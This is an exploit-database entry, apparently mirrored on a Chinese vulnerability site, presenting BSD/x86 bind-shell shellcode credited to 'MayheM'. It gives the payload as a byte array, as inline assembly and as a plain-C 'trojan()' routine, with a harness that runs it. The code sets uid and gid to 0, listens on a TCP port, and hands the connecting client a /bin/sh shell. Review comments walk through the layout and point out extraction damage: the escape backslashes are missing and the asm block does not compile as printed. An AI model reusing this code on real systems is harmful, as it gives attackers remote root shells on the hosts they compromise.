BSD/x86 – Bind (Random TCP Port) Shell Shellcode (143 bytes)


漏洞ID 1054687 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
CVE编号 N/A
CNNVD-ID N/A
漏洞平台 BSD_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13249
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
Here is a BSD remote shellcode.
Tested on NetBSD. Should work on FreeBSD and OpenBSD.

by MayheM
ExileCrew (www.exile2k.org)
*/

/*
** 143 bytes
**
** Review notes (reading, not assembling):
**  - The escapes are printed as "xNN" rather than "\xNN", so the listing as
**    shown does not encode the bytes it describes; treat it as a
**    transcription. With the escapes intact the payload is 142 bytes plus
**    the string literal's implicit NUL, i.e. the 143 that main() prints
**    through sizeof(shellcode).
**  - Layout: two syscalls, a forward jmp of 0x60 (= 96 bytes, which is
**    exactly the distance to the trailing "call"), the call jumps back to
**    the popl so %esi ends up holding the address of the trailing data,
**    then socket/bind/listen/accept/dup2 loop/execve. The per-line
**    "// name" comments are the author's and name the syscall each
**    "int 0x80" issues.
**  - The data block avoids NUL bytes by using 0x90 placeholders that the
**    code zeroes at run time; compare trojan() below, which uses real
**    0x00 bytes at the same offsets.
*/
char shellcode[] = 
"x31xC0"
"x50"
"x50"
"xB0x17"
"xCDx80"      // setuid
"x31xC0"
"x50"
"x50"
"xB0xB5"
"xCDx80"      // setgid
"xEBx60"      // jmp +0x60: lands on the "call" at the end (96 bytes ahead)
"x5E"         // popl %esi: address of the data block, pushed by that call
"x31xC0"
"x89x46x04"   // movl %eax,4(%esi): zero the four 0x90 placeholders in the sockaddr image
"x88x46x17"   // movb %al,0x17(%esi): NUL-terminate "/bin/sh" (offset 16+7)
"x6Ax06"
"x6Ax01"
"x6Ax02"
"xb0x61"
"x50"
"xCDx80"      // socket
"x89xc7"      // %edi = listening socket
"x31xc0"
"x6ax10"
"x56"
"x57"
"xb0x68"
"x50"
"xCDx80"      // bind
"x6Ax01"
"x57"
"xb0x6A"
"x50"
"xCDx80"      // listen
"x50"
"x50"
"x57"
"xB0x1E"
"x50"
"xCDx80"      //accept
"x89xc7"      // %edi = accepted socket
"x31xDB"
"x31xc9"
"xb1x03"      // %cl = 3; loop counter for the dup2 calls
"x49"         // decl %ecx (2, 1, 0)
"x31xc0"
"xb0x5A"
"x51"
"x57"
"x50"
"xcdx80"      // dup2
"x39xd9"      // cmpl %ebx,%ecx
"x75xf2"      // jne: repeat until fd 2, 1 and 0 are all redirected
"x31xc0"
"x89x76x18"   // argv[0] = %esi (points at "/bin/sh" after the addl below)
"x89x46x1c"   // argv[1] = NULL
"x8Dx56x1c"
"x8Dx4Ex18"
"x83xc6x10"   // %esi += 0x10: skip the sockaddr image, now points at "/bin/sh"
"x52"
"x51"
"x56"
"xb0x3b"
"x50"
"xcdx80"      // execve
"xe8x9bxffxffxff"   // call back by -101 bytes to the popl above; pushes the data address
// 16-byte sockaddr image: offset 1 = 0x02 (AF_INET), offsets 2-3 = 0x7A 0x69 (the port
// field, network order; 31337 if read as the port -- the title's "random port" is not
// visible in these bytes), offsets 4-7 = 0x90 placeholders zeroed at run time, last 8
// bytes = padding whose values look like leftover addresses -- TODO confirm unused.
"xc0x02x7ax69x90x90x90x90xc0xd5xbfxefxb8xd5xbfxef"
"/bin/sh";






/*
** ASM shellcode
**
** Inline-assembly rendering of the byte string above, kept as the author
** wrote it. Review notes (reading, not assembling):
**  - As printed this is a multi-line string literal and the ".string"
**    escapes have lost their backslashes, so the block is not compilable
**    as shown; it documents the byte array, it is not what main() runs.
**  - Each "int $0x80" is preceded by an extra "pushl %eax" after the real
**    arguments, which matches the BSD i386 syscall convention of a dummy
**    word in place of a return address -- TODO confirm for the target.
**  - "movb $0x03, %ecx" pairs an 8-bit mnemonic with a 32-bit register;
**    the byte array encodes "movb $0x03, %cl" (0xB1 0x03), so the two
**    listings differ on that line.
**  - After the jmp/call/pop, %esi points at the .string data: 16 bytes
**    that the byte array's comments identify as the sockaddr image, then
**    "/bin/sh". The stores to 0x04(%esi) and 0x17(%esi) zero the 0x90
**    placeholders and the byte after "/bin/sh" respectively; the
**    "addl $0x10, %esi" then advances %esi to the path for execve.
**  - The dup2 loop runs with %ecx = 2, 1, 0 and exits when %ecx == %ebx
**    (zero).
*/
fct()
{
  __asm__("


xorl  %eax, %eax
pushl %eax
pushl %eax
movb  $0x17, %al
int   $0x80 

xorl  %eax, %eax
pushl %eax
pushl %eax
movb  $0xB5, %al
int   $0x80 



jmp  data
code:
popl  %esi
xorl  %eax, %eax
movl  %eax, 0x04(%esi)
movb  %al , 0x17(%esi)

pushl $0x06
pushl $0x01
pushl $0x02
movb  $0x61, %al
pushl %eax
int   $0x80

movl  %eax, %edi
xorl  %eax, %eax
pushl $0x10
pushl %esi
pushl %edi
movb  $0x68, %al
pushl %eax
int   $0x80

pushl $0x01
pushl %edi
movb  $0x6A, %al
pushl %eax
int   $0x80

pushl %eax
pushl %eax
pushl %edi
movb  $0x1E, %al
pushl %eax
int   $0x80

movl  %eax, %edi
xorl  %ebx, %ebx
xorl  %ecx, %ecx
movb  $0x03, %ecx
loop:
decl  %ecx
xorl  %eax, %eax
movb  $0x5A, %al
pushl %ecx
pushl %edi
pushl %eax
int   $0x80
cmpl  %ebx, %ecx
jne   loop

xorl  %eax, %eax
movl  %esi, 0x18(%esi) 
movl  %eax, 0x1C(%esi)
leal  0x1C(%esi), %edx
leal  0x18(%esi), %ecx
addl  $0x10, %esi
pushl %edx
pushl %ecx
pushl %esi
movb  $0x3B, %al
pushl %eax
int   $0x80

data:
call  code
.string "xC0x02x7Ax69x90x90x90x90xC0xD5xBFxEFxB8xD5xBFxEF"
.string "/bin/shx90"
");
}




/*
** Test
**
** Harness that jumps into shellcode[]. Review notes:
**  - The local "fct" shadows the fct() function defined above, so the
**    inline-assembly version is never called; only the byte array runs.
**  - Relies on implicit declarations (no <stdio.h>, implicit int return)
**    and on the data array being executable, which depends on the
**    platform and toolchain rather than on this code.
**  - sizeof(shellcode) includes the string literal's terminating NUL,
**    which is how "143" is reached from 142 payload bytes.
**  - The format string is printed without its "\n" escape (extraction),
**    passes a size_t to %d, and contains the typo "lenght"; all three are
**    left as the author wrote them.
*/
main()
{
  void  (*fct)();
  
  printf("shellcode lenght = %d bytes n", sizeof(shellcode));
  fct = (void *) shellcode;   /* data pointer converted to a function pointer: not portable C */
  fct();
}





<!-- see body below -->
/*
** C shellcode
**
** Plain-C reference for what the byte array does. It is not called by
** main(). Written without prototypes and with no return-value checks:
** none of socket/bind/listen/accept/dup2/execve is tested for failure,
** and a failed accept() would be dup2'd as fd -1.
*/
trojan()
{
  int                   clientsock;
  int                   serversock;
  char                  *server;        /* raw 16-byte sockaddr image, handed to bind() as-is */
  char                  *args[2];       /* argv for execve: {"/bin/sh", NULL} */
  
  /* Same 16 bytes as the shellcode's data block, but with real 0x00 at
     offsets 4-7 where the shellcode used 0x90 placeholders. Offset 1 =
     0x02 (AF_INET), offsets 2-3 = 0x7A 0x69 (port field, network order).
     The "xNN" escapes here have also lost their backslashes in extraction. */
  server = "xC0x02x7Ax69x00x00x00x00xC0xD5xBFxEFxB8xD5xBFxEF";
  args[0] = "/bin/sh";
  args[1] = 0x00;
  setuid(0);
  setgid(0);
  serversock = socket(0x02, 0x01, 0x06);        /* AF_INET, SOCK_STREAM, protocol 6 (TCP) */
  bind(serversock, server, 0x10);               /* char * where struct sockaddr * is expected; 0x10 = sizeof(struct sockaddr_in) */
  listen(serversock, 0x01);
  clientsock = accept(serversock, 0x00, 0x00);
  dup2(clientsock, 0x02);                       /* stderr, stdout, stdin -> the accepted socket */
  dup2(clientsock, 0x01);
  dup2(clientsock, 0x00);
  execve(args[0], args, args[1]);               /* envp = args[1] = NULL */
}

// milw0rm.com [2004-09-26]
